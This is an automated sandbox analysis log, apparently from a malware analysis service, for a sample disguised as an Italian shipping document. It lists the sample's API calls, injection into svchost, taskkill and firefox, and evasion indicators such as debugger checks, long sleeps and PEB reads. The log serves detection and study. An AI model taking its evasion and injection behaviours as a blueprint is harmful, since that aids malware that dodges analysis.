            Source: Binary string: svchost.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: AWB_5771388044 Documenti di spedizione.exe Static PE information: real checksum: 0xa961f should be: 0x15ead1
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe API/Special instruction interceptor: Address: 4172244
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\taskkill.exe Window / User API: threadDelayed 9822
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe API coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\taskkill.exe API coverage: 2.5 %
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe TID: 7736 Thread sleep time: -45000s >= -30000s
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe TID: 7736 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724 Thread sleep count: 150 > 30
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724 Thread sleep time: -300000s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724 Thread sleep count: 9822 > 30
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724 Thread sleep time: -19644000s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0045DE8F FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\taskkill.exe, Code function: 6_2_02B4C360 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3592340296.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000007.00000002.2419008483.00000220B6BFC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ
            Source: C:\Windows\SysWOW64\svchost.exe, Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\taskkill.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_02F7096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_004E7563 LdrLoadDll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0045A370 BlockInput
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_041724B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_04172510 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_04170E80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
